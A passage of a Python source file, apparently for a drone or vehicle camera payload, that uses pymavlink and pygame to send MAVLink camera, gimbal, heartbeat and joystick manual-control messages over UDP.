s = CdcAcmSerialPort(port)
s.close()
result.append(port)
else:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
def print_red(self,text,value):
print("\033[31m %s : %6.3f"%(text,value))
def print_yellow(self,text,value):
print("\033[33m %s : %6.3f"%(text,value))
def print_2_yellow(self,text,value1,value2):
print("\033[33m %s : %6.3f %6.3f"%(text,value1,value2))
def print_3_yellow(self,text,value1,value2,value3):
print("\033[33m %s : %6.3f %6.3f %6.3f"%(text,value1,value2,value3))
def print_3_blue(self,text,value1,value2,value3):
print("\033[34m %s %6.3f %6.3f %6.3f"%(text,value1,value2,value3))
def print_blue(self,text,value):
print("\033[34m %s : %6.3f"%(text,value))
def joystickInit(self):
# Set the width and height of the screen [width,height]
size = [500, 700]
screen = pygame.display.set_mode(size)
pygame.display.set_caption("----- My test of mavlink and joystick -----")
pygame.init()
# Used to manage how fast the screen updates
clock = pygame.time.Clock()
# Initialize the joysticks
pygame.joystick.init()
joystick = pygame.joystick.Joystick(0)
joystick.init()
# Get ready to print
textPrint = TextPrint()
def initUDPSocket(self,bind):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# bind the socket if this is a server (pass bind==1)
if bind == 1:
host = 'localhost'
port = JOYSTICK_UDP_PORT
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
addr = (host,port)
sock.bind(addr)
sock.setblocking(0)
return sock
def closeUDPSocket(self,udp_socket):
udp_socket.close()
def serverReadUDPSocket(self,udp_socket,port):
conn, addr = udp_socket.recvfrom(port)
return conn,addr
def clientReadUDPSocket(self,udp_socket,port):
dataV = udp_socket.recvfrom(port)
return dataV
def joyMavlinkInit(self):
mav = mavutil.mavlink.MAVLink(fifo())
mav.srcSystem = MAV_SOURCE # set to master
def blockMouseDown(self,block_flag):
if block_flag:
pygame.event.set_blocked(MOUSEBUTTONDOWN)
else:
pygame.event.set_allowed(MOUSEBUTTONDOWN)
def blockMouseUp(self,block_flag):
if block_flag:
pygame.event.set_blocked(MOUSEBUTTONUP)
else:
pygame.event.set_allowed(MOUSEBUTTONUP)
def checkMouseDwnBlock(self):
print ('MOUSEBUTTONDOWN is block: ', pygame.event.get_blocked(MOUSEBUTTONDOWN))
def checkMouseUpBlock(self):
print ('MOUSEBUTTONUP is block: ', pygame.event.get_blocked(MOUSEBUTTONUP))
def write_mav_serial_data(self, serial, x ):
serial.write(struct.pack(x))
def write_pack_serial_data(self, serial, x, y, z, roll, pitch, yaw):
serial.write(struct.pack('<chhhhhh', 'S',x, y, z, roll, pitch, yaw))
def test_linear(self, serial, lenght=200, times=1000, delta=0.05):
for angle in xrange(1, times, 5):
a = angle * math.pi / 180
self.write_serial_data(serial, int(lenght * math.cos(a)), int(lenght * math.sin(a)),0,0,0,0)
time.sleep(delta)
self.write_serial_data(serial, 0,0,0,0,0,0)
def test_angles(self, serial, lenght=200, times=1000, delta=0.05):
for angle in xrange(1, times, 5):
a = angle * math.pi / 180
self.write_serial_data(0, 0,0,0,int(30 * math.cos(a)),int(30 * math.sin(-a)))
time.sleep(delta)
self.write_serial_data(serial, 0,0,0,0,0,0)
def test_yaw(self, serial, lenght=200, times=1000, delta=0.05):
for angle in xrange(1, times, 5):
a = angle * math.pi / 180
self.write_serial_data(serial, int(lenght * math.cos(a)),0,0,int(30 * math.sin(a)),0,0)
time.sleep(delta)
self.write_serial_data(serial, 0,0,0,0,0,0)
def processJoystickSendMavlink(self,sock):
msgbuf = None
# -------- Main Program Loop -----------
while done == False:
btns = 0
thrust = 0.0
rudder = 0.0
# EVENT PROCESSING STEP
for event in pygame.event.get(): # User did something
screen.fill(WHITE)
textPrint.reset()
# Possible joystick actions: JOYAXISMOTION JOYBALLMOTION JOYBUTTONDOWN JOYBUTTONUP JOYHATMOTION
# QUIT - none
# ACTIVEEVENT - gain, state
# KEYDOWN - unicode, key, mod
# KEYUP - key, mod
# MOUSEMOTION - pos, rel, buttons
# MOUSEBUTTONUP - pos, button
# MOUSEBUTTONDOWN - pos, button
# JOYAXISMOTION - joy, axis, value
# JOYBALLMOTION - joy, ball, rel
# JOYHATMOTION - joy, hat, value
# JOYBUTTONUP - joy, button
# JOYBUTTONDOWN - joy, button
# VIDEORESIZE - size, w, h
# VIDEOEXPOSE - none
# USEREVENT – code
if event.type == pygame.QUIT:
done=True
elif event.type == pygame.MOUSEBUTTONDOWN:
print_2_yellow("Mouse button down pressed.",event.button,event.pos)
elif event.type == pygame.MOUSEBUTTONUP:
print_2_yellow("Mouse button up pressed.",event.button,event.pos)
elif event.type == pygame.JOYBUTTONDOWN:
print_2_yellow("Joystick button down pressed.",event.button,event.joy)
elif event.type == pygame.JOYBUTTONUP:
print_2_yellow("Joystick button up released.",event.button,event.joy)
elif event.type == pygame.JOYAXISMOTION:
print_3_yellow("Joystick axis motion.",event.joy,event.axis,event.value)
elif event.type == pygame.JOYBALLMOTION:
print_3_yellow("Joystick ball motion.",event.joy,event.ball,event.rel)
elif event.type == pygame.JOYHATMOTION:
print_3_yellow("Joystick hat motion",event.joy,event.hat,event.value)
elif event.type == pygame.VIDEORESIZE:
print_3_blue("video re-size.",event.size,event.w,event.h)
elif event.type == pygame.KEYDOWN:
print_3_yellow("key down ",event.unicode,event.key,event.mod)
elif event.type == pygame.KEYUP:
print_2_yellow("key up ",event.key,event.mod)
# Get the name from the OS for the controller/joystick
name = joystick.get_name()
print("Joystick name: {}".format(name) )
# get the buttons
buttons = joystick.get_numbuttons()
for i in range( buttons ):
button = joystick.get_button( i )
print( "Button {:>2} value: {}".format(i,button) )
# get the hats
# Hat switch. All or nothing for direction, not like joysticks.
# Value comes back in an array.
hats = joystick.get_numhats()
print( "Number of hats: {}".format(hats) )
textPrint.indent()
for i in range( hats ):
hat = joystick.get_hat( i )
print( "Hat {} value: {}".format(i, str(hat)) )
# Getting available devices
for id in range(pygame.joystick.get_count()):
print( "devices list : %u %d %s" % (id, pygame.joystick.Joystick(id).get_name()))
# Get thrust and break first
# mix 2 shifts in single channels
thr = (joystick.get_axis(5) + 1) / 2
brk = -(joystick.get_axis(2) + 1) / 2
thrust = thr + brk
print_yellow("Thrust value ",thrust)
# this is the x axis
rudder = joystick.get_axis(0)
print_blue("Rudder value ",rudder)
# now collect all buttons
btns = 0
for i in range(joystick.get_numbuttons()):
btns |= joystick.get_button(i) << i
# Usually axis run in pairs, up/down for one, and left/right for
# the other.
axes = joystick.get_numaxes()
print( "Number of axes: {}".format(axes) )
textPrint.indent()
for i in range( axes ):
axis = joystick.get_axis( i )
print( "Axis {} value: {:>6.3f}".format(i, axis) )
textPrint.unindent()
# Update events in pygame
pygame.event.pump()
# pack acquired data and throw it to socket
msg = mavutil.mavlink.MAVLink_manual_control_message( target = MAV_TARGET, x = X_MAX, y = Y_MAX, z = round(thrust*JOY_SCALE), r = round(rudder*JOY_SCALE), buttons = btns)
msgbuf = msg.pack(mav)
try:
jid = joystick.get_instance_id()
except AttributeError:
# get_instance_id() is an SDL2 method
jid = joystick.get_id()
print( "Joystick {}".format(jid))
try:
guid = joystick.get_guid()
except AttributeError:
# get_guid() is an SDL2 method
pass
else:
print("GUID: {}".format(guid))
# Limit to 20 frames per second
clock.tick(25)
if msgbuf:
# send the message on the UDP Port
sock.sendto(msgbuf, ('', JOYSTICK_UDP_PORT))
# send the message on serial
# write_mav_serial_data(serial, msgbuf)
# Close the window and quit.
# If you forget this line, the program will 'hang'
# on exit if running from IDLE.
pygame.joystick.quit()
pygame.quit()
# make a mavlink connection using mavutil like ardusub does....
#
# Create the connection and return it for use with the other functions
#
# TODO::: change the port and see if this can run entirely paralel with camera
# take picture on another port
#
def makeMAVlinkConn(self):
try:
#the_conection = mavutil.mavlink_connection('udpin:0.0.0.0:14560',autoreconnect=True)
the_conection = mavutil.mavlink_connection('udpin:0.0.0.0:14550',autoreconnect=True, source_system=1, source_component=100)
return the_conection,True
except Exception as err_msg:
print("Failed to connect : %s" % (err_msg))
return the_conection,False
def makeNewMAVlinkConn(self,id):
try:
#the_conection = mavutil.mavlink_connection('udpin:0.0.0.0:14560',autoreconnect=True, source_system=id)
the_conection = mavutil.mavlink_connection('udpin:0.0.0.0:14550',autoreconnect=True, source_system=id, source_component=100)
return the_conection,True
except Exception as err_msg:
print("Failed to connect : %s" % (err_msg))
return the_conection,False
# Send heartbeat from a GCS (types are define as enum in the dialect file).
#
def mavlink_send_GCS_heartbeat(self, the_conection):
print(" heartbeat.............................. %s\n"%(mavutil.mavlink.MAV_TYPE_CAMERA))
try:
the_conection.mav.heartbeat_send(mavutil.mavlink.MAV_TYPE_CAMERA, mavutil.mavlink.MAV_AUTOPILOT_INVALID, 0, 0, mavutil.mavlink.MAV_STATE_ACTIVE)
ret = True
except Exception as err_msg:
print("Failed to send GCS heartbeat : %s" % (err_msg))
ret = False
return ret
# Send heartbeat from a MAVLink application.
#
def mavlink_send_OBC_heartbeat2(self, the_connection):
try:
mavutil.mavlink.heartbeat_send(mavutil.mavlink.MAV_TYPE_CAMERA, mavutil.mavlink.MAV_AUTOPILOT_GENERIC, 0, 0, 0)
ret = True
except Exception as err_msg:
print("Failed to send OBC heartbeat : %s" % (err_msg))
ret = False
return ret
# Receive heartbeat from a MAVLink application.
#
def mavlink_rcv_heartbeat(self, the_connection):
try:
the_connection.wait_heartbeat()
ret = True
except Exception as err_msg:
print("Failed to wait for heartbeat : %s" % (err_msg))
ret = False
return ret
# Sets a value to the rc channel
#
def mavlink_set_rc_channel_pwm(self, the_connection, channel_id, pwm=1500):
#""" Set RC channel pwm value
#Args:
# channel_id (TYPE): Channel ID
# pwm (int, optional): Channel pwm value 1100-1900
#"""
if channel_id < 1 or channel_id > 18:
print("Channel does not exist.")
return
# Mavlink 2 supports up to 18 channels:
# https://mavlink.io/en/messages/common.html#RC_CHANNELS_OVERRIDE
rc_channel_values = [65535 for _ in range(18)]
rc_channel_values[channel_id - 1] = pwm
try:
the_connection.mav.rc_channels_override_send( the_connection.target_system, the_connection.target_component, *rc_channel_values )
ret = True
except Exception as err_msg:
print("Failed to set RC Chan PWM : %s" % (err_msg))
ret = False
return ret
# drives a gimbal axis controller to the pitch roll yaw specified
#
def gimbal_move_to( self, the_connection, tilt=0, roll=0, pan=0):
#"""
#Moves gimbal to given position
try:
the_connection.mav.command_long_send(the_connection.target_system, the_connection.target_component, mavutil.mavlink.MAV_CMD_DO_MOUNT_CONTROL, 1, tilt, roll, pan, 0, 0, 0, mavutil.mavlink.MAV_MOUNT_MODE_MAVLINK_TARGETING)
ret = True
except Exception as err_msg:
print("Failed to move gimbal using command long : %s" % (err_msg))
ret = False
return ret
def mavlink10(self,connID):
# '''return True if using MAVLink 1.0 or later'''
return float(connID.WIRE_PROTOCOL_VERSION) >= 1
def mavlink20(self,connID):
# '''return True if using MAVLink 2.0 or later'''
return float(connID.WIRE_PROTOCOL_VERSION) >= 2
# Set relay_pin to value of state
def mavlink_set_relay(self, the_connection, relay_pin=0, state=True):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_DO_SET_RELAY, # command
0, # Confirmation
relay_pin, # Relay Number
int(state), # state (1 to indicate arm)
0, # param3 (all other params meaningless)
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to set relay using command long : %s" % (err_msg))
ret = False
return ret
# ref:- https://mavlink.io/en/messages/common.html#MAV_CMD
def mavlink_video_stop_capture(self, the_connection, streamNo):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_VIDEO_STOP_CAPTURE, # command
0, # Confirmation
streamNo, # stream number
0, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to stop video capture using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_video_start_capture(self, the_connection, streamNo, freq):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_VIDEO_START_CAPTURE, # command
0, # Confirmation
streamNo, # stream number
freq, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to start video capture using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_image_stop_capture(self, the_connection):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_IMAGE_STOP_CAPTURE, # command
0, # Confirmation
0, # param1
0, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to stop image capture using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_image_start_capture(self, the_connection, interval, totalImages, seqNo):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_IMAGE_START_CAPTURE, # command
0, # Confirmation
0, # param1
interval, # Desired elapsed time between two consecutive pictures (in seconds)
totalImages, # Total number of images to capture. 0 to capture forever/until MAV_CMD_IMAGE_STOP_CAPTURE.
seqNo, # Capture sequence number starting from 1. This is only valid for single-capture (param3 == 1), otherwise set to 0. Increment the capture ID for each capture command to prevent double captures when a command is re-transmitted
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to start image capture using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_video_stop_streaming(self, the_connection, streamNo):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_VIDEO_STOP_STREAMING, # command
0, # Confirmation
streamNo, # stream number
0, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to send stop streaming using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_do_ftp_send(self, the_connection, network, payload):
MAX_CHUNK_BYTES = 251
numOfchunk = round(len(payload) / MAX_CHUNK_BYTES)
for i in range(numOfchunk):
#print(f"ftp send chunk {i} offset {i*251}")
msgpay = []
b = 1
for b in range(MAX_CHUNK_BYTES):
try:
msgpay.append(payload[b+(i*251)])
except Exception as e:
msgpay.append(0)
try:
the_connection.mav.file_transfer_protocol_send (
network,
the_connection.target_system, # target_system
the_connection.target_component, # target_component
msgpay )
except Exception as e:
print(f" ftp send exception {e} \nchunk {i} @ offset {i*MAX_CHUNK_BYTES}")
def mavlink_video_start_streaming(self, the_connection, streamNo):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_VIDEO_START_STREAMING, # command
0, # Confirmation
streamNo, # stream number
0, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to send start streaming using command long : %s" % (err_msg))
ret = False
return ret
# suitable variables to drive CamMode
#
MAV_CAMERA_MODE_IMAGE = 0
MAV_CAMERA_MODE_VIDEO = 1
MAV_CAMERA_MODE_IMAGE_SURVEY = 2
def mavlink_video_set_camera_mode(self, the_connection, camMode):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_SET_CAMERA_MODE, # command
0, # Confirmation
0, # param1
CamMode, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to send video set camera mode using command long : %s" % (err_msg))
ret = False
return ret
# suitable variables to drive CamZoomType
#
MAV_ZOOM_TYPE_STEP = 0 # Zoom one step increment (-1 for wide, 1 for tele)
MAV_ZOOM_TYPE_CONTINUOUS = 1 # Continuous zoom up/down until stopped (-1 for wide, 1 for tele, 0 to stop zooming)
MAV_ZOOM_TYPE_RANGE = 2 # Zoom value as proportion of full camera range (a value between 0.0 and 100.0)
MAV_ZOOM_TYPE_FOCAL_LENGTH = 3 # Zoom value/variable focal length in milimetres
def mavlink_video_set_camera_zoom(self, the_connection, camZoomType, camZoomValue):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_SET_CAMERA_MODE, # command
0, # Confirmation
CamZoomType, # param1
CamZoomValue, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to send camera zoom using command long : %s" % (err_msg))
ret = False
return ret
MAV_FOCUS_TYPE_STEP = 0 # Focus one step increment (-1 for focusing in, 1 for focusing out towards infinity).
MAV_FOCUS_TYPE_CONTINUOUS = 1 # Continuous focus up/down until stopped (-1 for focusing in, 1 for focusing out towards infinity, 0 to stop focusing)
MAV_FOCUS_TYPE_RANGE = 2 # Focus value as proportion of full camera focus range (a value between 0.0 and 100.0)
MAV_FOCUS_TYPE_METERS = 3 # Focus value in metres
def mavlink_video_set_camera_focus(self, the_connection, camFocusType, camFocusValue):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavdefs.MAV_CMD_SET_CAMERA_FOCUS, # command
0, # Confirmation
camFocusType, # param1
camFocusValue, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to send camera focus using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_do_digicam_configure(self, the_connection, camMode, camShutterSpeed, camAperture, camISO, camExposure, camCommandIdentity, camEngineCutOff):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_DO_DIGICAM_CONFIGURE, # command
0, # Confirmation
camMode, # param1
camShutterSpeed, # param2
camAperture, # param3
camISO, # param4
camExposure, # param5
camCommandIdentity, # param6
camEngineCutOff) # param7
ret = True
except Exception as err_msg:
print("Failed to send digicam configure using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_do_digicam_control(self, the_connection, camSessionControl, camZoomAbsolute, camZoomRelative, camFocus, camShootCommand, camCommandIdentity, camShotID):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_DO_DIGICAM_CONTROL, # command
0, # Confirmation
camSessionControl, # param1
camZoomAbsolute, # param2
camZoomRelative, # param3
camFocus, # param4
camShootCommand, # param5
camCommandIdentity, # param6
camShotID) # param7
ret = True
except Exception as err_msg:
print("Failed to send digicam control using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_do_video_control(self, the_connection, camID, camTransmission, camInterval, camRecording):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_DO_CONTROL_VIDEO, # command
0, # Confirmation
camID, # param1
camTransmission, # param2
camInterval, # param3
camRecording, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to send do video control using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_get_camera_settings(self, the_connection):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_REQUEST_CAMERA_SETTINGS, # command
0, # Confirmation
1, # param1
0, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to get cam settings using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_get_storage_info(self, the_connection, StoId):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_REQUEST_STORAGE_INFORMATION, # command
0, # Confirmation
StoId, # param1
1, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to get storage info using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_get_capture_status(self, the_connection):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_REQUEST_CAMERA_CAPTURE_STATUS, # command
0, # Confirmation
1, # param1
0, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to get capture status using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_get_stream_info(self, the_connection):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_REQUEST_VIDEO_STREAM_INFORMATION, # command
0, # Confirmation
1, # param1
0, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to get stream info using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_reset_camera(self, the_connection):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_RESET_CAMERA_SETTINGS, # command
0, # Confirmation
1, # param1
0, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to reset camera using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_set_camera_trig_interval(self, the_connection, camTriggerCycle, camShutterIntegration):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_DO_SET_CAM_TRIGG_INTERVAL, # command
0, # Confirmation
camTriggerCycle, # param1
camShutterIntegration, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to set camera trip interval using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_set_camera_to_quaternion(self, the_connection, q1, q2, q3, q4):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_DO_MOUNT_CONTROL_QUAT, # command
0, # Confirmation
q1, # param1
q2, # param2
q3, # param3
q4, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to set camera to quartenion using command long : %s" % (err_msg))
ret = False
return ret
# convert to integer param_value from mavlink
#
def mav_param_type_conv( self, typ, value ):
if (mavutil.mavlink.MAV_PARAM_TYPE_INT64 <= typ ):
return int(struct.unpack('I', struct.pack('f', value))[0])
else:
return value
# convert an integer param_value to be sent on mavlink
#
def param_to_mav_msg_conv( self, typ, value ):
if (mavutil.mavlink.MAV_PARAM_TYPE_INT64 <= typ ):
return float(struct.unpack('f', struct.pack('I', value))[0])
else:
return value
def mavlink_send_param_value(self, the_connection):
print("\033[36m sending a parameter")
d = struct.unpack('f', struct.pack('I', 1))[0]
try:
the_connection.mav.param_value_send(
"sonyISO".encode('ascii'),
0,
mavutil.mavlink.MAV_PARAM_TYPE_UINT32,
8,
1)
ret = True
except Exception as err_msg:
print("Failed to send param value message 1: %s" % (err_msg))
ret = False
d = struct.unpack('f', struct.pack('I', 10))[0]
try:
the_connection.mav.param_value_send(
"sonyAperture".encode('ascii'),
d,
mavutil.mavlink.MAV_PARAM_TYPE_UINT32,
8,
1)
ret = True
except Exception as err_msg:
print("Failed to send param value message 2: %s" % (err_msg))
ret = False
d = struct.unpack('f', struct.pack('I', 30))[0]
try:
the_connection.mav.param_value_send(
"sonyExProMode".encode('ascii'),
d,
mavutil.mavlink.MAV_PARAM_TYPE_UINT32,
8,
1)
ret = True
except Exception as err_msg:
print("Failed to send param value message 3: %s" % (err_msg))
ret = False
d = struct.unpack('f', struct.pack('I', 5))[0]
try:
the_connection.mav.param_value_send(
"sonyFocusMode".encode('ascii'),
d,
mavutil.mavlink.MAV_PARAM_TYPE_UINT32,
8,
1)
ret = True
except Exception as err_msg:
print("Failed to send param value message 4: %s" % (err_msg))
ret = False
p = struct.unpack('f', struct.pack('I', 11))[0]
try:
the_connection.mav.param_value_send(
"sonyFocusArea".encode('ascii'),
p,
mavutil.mavlink.MAV_PARAM_TYPE_UINT32,
8,
1)
ret = True
except Exception as err_msg:
print("Failed to send param value message 5: %s" % (err_msg))
ret = False
d = struct.unpack('f', struct.pack('I', 675))[0]
try:
the_connection.mav.param_value_send(
"sonyShutSpd".encode('ascii'),
d,
mavutil.mavlink.MAV_PARAM_TYPE_UINT32,
8,
1)
ret = True
except Exception as err_msg:
print("Failed to send param value message 6: %s" % (err_msg))
ret = False
d = struct.unpack('f', struct.pack('I', 76))[0]
try:
the_connection.mav.param_value_send(
"sonyWhiteBalance".encode('ascii'),
d,
mavutil.mavlink.MAV_PARAM_TYPE_UINT32,
8,
1)
ret = True
except Exception as err_msg:
print("Failed to send param value message 7: %s" % (err_msg))
ret = False
d = struct.unpack('f', struct.pack('I', 7))[0]
try:
the_connection.mav.param_value_send(
"sonyStillCapMode".encode('ascii'),
d,
mavutil.mavlink.MAV_PARAM_TYPE_UINT32,
8,
1)
ret = True
except Exception as err_msg:
print("Failed to send param value message 8: %s" % (err_msg))
ret = False
return ret
def mavlink_send_camera_information(self, the_connection):
#if self.mavlink10():
vendor_name_nd = np.dtype([('ABB',np.uint8)])
model_name_nd = np.dtype([('BAC',np.uint8)])
vendor_name_list = [65,66,66]
model_name_list = [66,65,67]
vendor_name = "ABB"
model_name = "BAC"
#
# convert string to ascii list and make numpy array
#
vn = []
mn = []
j = 0
for j in range(len(model_name)):
mn.append(ord(model_name[j]))
k = 0
for k in range(len(vendor_name)):
vn.append(ord(vendor_name[k]))
u8_model_name = np.array(mn, np.uint8)
u8_vendor_name = np.array(vn, np.uint8)
mn_u8 = u8_model_name.astype(np.uint8)
vn_u8 = u8_vendor_name.astype(np.uint8)
arr_vendor = [0] * 32
arr_vendor[0] = ord("A")
arr_model = [0] * 32
arr_model[0] = ord("C")
# "http://10.0.2.51/cam_defs/alpha_cam_new.xml".encode('ascii'))
print("\033[33m Sending camera information")
try:
the_connection.mav.camera_information_send(
100,
arr_vendor,
arr_model,
0,
0,
0,
0,
0,
0,
0,
391,
1,
"http://10.0.2.51/cam_defs".encode('ascii'))
ret = True
except Exception as err_msg:
print("Failed to send camera information message : %s" % (err_msg))
ret = False
return ret
def mavlink_send_camera_settings(self, the_connection):
#if self.mavlink10():
try:
the_connection.mav.camera_settings_send(
self.time_boot_ms,
self.mode_id, # Camera mode
self.zoomLevel, # Current zoom level (0.0 to 100.0, NaN if not known)*/
self.focusLevel)
ret = True
except Exception as err_msg:
print("Failed to send camera settings message : %s" % (err_msg))
ret = False
return ret
def mavlink_send_storage_information(self, the_connection):
#if self.mavlink10():
#
# This is a byte array of the string
#
b = bytearray(b'ABB')
#
# forced uint8 with numpy
#
b8_numpy = np.array(b, np.uint8)
#
# ascii string encoded
#
nm = "storenm"
try:
u8_model_name = (nm).encode("ascii")
except Exception as err_msg:
print("\033[32m Failed to SET storage information message : %s " % (err_msg))
print(f" sending storage info {u8_model_name} type {type(u8_model_name)}")
try:
the_connection.mav.storage_information_send(
self.time_boot_ms,
self.storage_id,
self.storage_count,
self.status,
self.total_capacity,
self.used_capacity,
self.available_capacity,
self.read_speed,
self.write_speed,
1,
np.array(u8_model_name,np.uint8),
2)
ret = True
except Exception as err_msg:
print("\033[32m Failed to send storage information message : %s type is %s" % (err_msg,type(u8_model_name)))
ret = False
return ret
def mavlink_send_camera_capture_status(self, the_connection):
try:
the_connection.mav.camera_capture_status_send(
self.time_boot_ms,
self.image_status,
self.video_status,
self.image_interval,
self.recording_time_ms,
self.available_capacity,
self.image_count)
ret = True
except Exception as err_msg:
print("Failed to send camera capture status message : %s" % (err_msg))
ret = False
return ret
def mavlink_send_video_stream_information(self, the_connection):
#if self.mavlink10():
print(" !!! sending the video stream information !!! \n")
try:
the_connection.mav.video_stream_information_send(
self.stream_id,
self.count,
self.stream_type,
self.Vflags,
self.framerate,
self.Vresolution_h,
self.Vresolution_v,
self.bitrate,
self.rotation,
self.hfov,
#self.videoname,
(self.videoname).encode('ascii'),
(self.video_uri).encode('ascii'))
ret = True
except Exception as err_msg:
print("Failed to send video stream information message : %s" % (err_msg))
ret = False
return ret
def mavlink_send_camera_image_captured(self, the_connection):
#if self.mavlink10():
b = bytearray(b'[2,3,4,5]')
print(f"sending cam image cap {self.time_boot_ms}")
try:
the_connection.mav.camera_image_captured_send(
self.time_boot_ms,
self.time_utc,
self.camera_id,
self.lat,
self.lon,
self.alt,
self.relative_alt,
b,
self.image_index,
self.capture_result,
self.file_url)
ret = True
except Exception as err_msg:
print("Failed to send camera image captured message : %s" % (err_msg))
ret = False
return ret
def mavlink_send_camera_feedback(self, the_connection):
#if self.mavlink10():
print("\033[32m sending camera feedback")
try:
the_connection.mav.camera_feedback_send(
self.time_usec,
the_connection.target_system,
self.cam_idx,
self.img_idx,
self.lat,
self.lng,
self.alt_msl,
self.alt_rel,
self.roll,
self.pitch,
self.yaw,
self.foc_len,
self.CFflags)
ret = True
print("\033[36m success sending camera feedback")
except Exception as err_msg:
print("Failed to send camera feedback message : %s" % (err_msg))
ret = False
return ret
# process the incoming messages received
#
def process_messages_from_connection(self, fra, the_connection, sharedObj, redCam=0):
#"""
#This runs continuously. The mavutil.recv_match() function will call mavutil.post_message()
#any time a new message is received, and will notify all functions in the master.message_hooks list.
#"""
loop = 5
while loop >= 1:
print("im receiving.............")
#self.update_uptime_label( )
#self.update_utc_label( )
#
# wait heartbeat (only the GCS does this )
# m = the_connection.recv_match(type="HEARTBEAT", blocking=True, timeout=5)
#
# you can also use type lists like this
